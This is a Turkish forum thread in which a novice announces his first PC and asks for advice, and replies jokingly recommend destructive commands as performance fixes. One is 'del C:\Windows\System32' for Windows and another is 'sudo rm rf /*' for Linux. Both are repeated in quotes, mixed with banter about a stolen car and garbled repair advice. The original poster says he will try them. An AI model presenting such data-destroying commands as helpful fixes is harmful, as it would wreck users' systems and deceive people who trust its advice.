Yeni PC aldım

• Konuyu başlatan Konuyu başlatan Hans
  • Başlangıç Tarihi Başlangıç Tarihi
  • Mesaj Mesaj 38
  • Görüntüleme Görüntüleme 1B
Evet arkadaşlar, ilk bilgisayarımı aldım! Bir hayırlı olsun alırım. İlk olarak ne yapmamı önerirsiniz?
İçinde Windows yüklü geliyorsa aşağıdaki komut sistem performansını artıracaktır.
Kod:
del C:\Windows\System32

Araba çalıntı olduğu için @Hans hocam için sorun olmaz.

Araba çalıntı olduğu için @Hans hocam için sorun olmaz.

Hocam arabanın arkasını vurduğumu yeni fark ettim ve abimden çalmıştım. Taktik lazım.

Özel siyah efekt ile gamzeleri var hocam. Demek ki naz yapıyor.

Olabilir.

İçinde Windows yüklü geliyorsa aşağıdaki komut sistem performansını artıracaktır.
Kod:
del C:\Windows\System32

Hocam bu kodları arabaya atsam hasar, silinir mi?

Hasarı silmek için sfc /scannow, chkdsk ve dism /Online /Cleanup-Image /RestoreHealth komutlarını girin. Sonra arabayı başlatın, "vın vı-vın" diye bir ses geliyorsa hasarı "Kilometre sayacı ÷ çalışma dakikası" ne kadarsa o kadar dakikada düzeltir.

Hocam arabanın arkasını vurduğumu yeni fark ettim ve abimden çalmıştım. Taktik lazım.

Olabilir.

Silinir hocam direk beyni silinir mis gibi olur, ha birde aracın sigortalarını da söküp mangal ateşine atabilirsiniz arabaya ek performans sağlar. Bence direk yenisini çalın hocam uğraşmayın.

Eğer Linux varsa sudo rm rf /* komutuyla düzeltebilir.

Silinir hocam direk beyni silinir mis gibi olur, ha bir de aracın sigortalarını da söküp mangal ateşine atabilirsiniz arabaya ek performans sağlar. Bence direk yenisini çalın hocam uğraşmayın.

Çok teşekkürler arkadaşlar. Eve gidince deneyeceğim.

Eğer Linux varsa sudo rm rf /* komutuyla düzeltebilir.

Hocam arabada pradus var sanırım.

Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…